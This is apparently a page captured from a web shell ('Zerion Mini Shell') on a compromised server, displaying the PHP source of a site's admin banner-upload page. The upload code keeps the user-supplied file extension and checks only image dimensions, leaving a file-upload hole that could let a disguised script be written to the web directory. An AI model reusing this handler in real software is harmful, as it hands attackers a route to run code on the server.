Mini Shell

Direktori : /home/emypro/www/admin/
Upload File :
Current File : /home/emypro/www/admin/banners_new.php

<?php include('header.php') ?>
<?php
$banner = new Banner();

$flash = array();
// CREATE
if(isset($_POST['action']) && $_POST['action'] == 'create'):
	unset($_POST['action']);

	$file = $_FILES['image'];

	if($file['size'] > 1 && strlen($_POST['title']) > 1 && strlen($_POST['link']) > 7):

		list($image_width, $image_height) = getimagesize($file['tmp_name']);
		if($image_width == 1200 && $image_height == 500):
			$file_name = explode('.', $file['name']);
			$file_ext  = end($file_name);

			// new name
			$file_name = md5(time()) .'.'. $file_ext;

			$_POST['image'] = $file_name;

			if($banner->create($_POST)):
				move_uploaded_file($file['tmp_name'], DIR_IMG .'banners/'. $file_name);
				$flash = Helper::flash('success');
			else:
				$flash = Helper::flash('error');
			endif;
		else:
			$flash = Helper::flash('message', 'Por favor verifique as dimensões da imagem.');
		endif;

	else:
		$flash = Helper::flash('error');
	endif;
endif;
?>
<div id="page">
	<div class="row">
		<div class="col lg-12">
			<h2>Banners / adicionar</h2>
		</div>
	</div>
	<div class="row">
		<?php if($flash): ?>
		<div class="col-lg-12">
			<div class="alert alert-<?= $flash['class'] ?> alert-dismissible">
				<button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">&times;</span></button>
				<?= $flash['message'] ?>
			</div>
		</div>
		<?php endif ?>
		<div class="col-lg-12">
			<a href="banners.php" class="btn btn-primary">Voltar</a>
			<hr>
			<small>* todos os campos são obrigatórios</small><br>
			<small>* Tamanho permitido de imagem é 1200x500 px</small><br>
			<form action="" method="post" enctype="multipart/form-data">
				<div class="form-group">
					<label for="title">Título:</label>
					<input type="text" name="title" class="form-control">
				</div>
				<div class="form-group">
					<label for="link">Link:</label>
					<input type="text" name="link" class="form-control">
				</div>
				<div class="form-group">
					<label for="image">Imagem: <small>(dimensões 1200x500 px)</small></label>
					<input type="file" name="image" class="form-control">
				</div>
				<div class="form-group">
					<input type="hidden" name="action" value="create">
					<button type="submit" class="btn btn-primary">Adicionar</button>
				</div>
			</form>
		</div>
	</div>
</div>

<?php include('footer.php') ?>

Zerion Mini Shell 1.0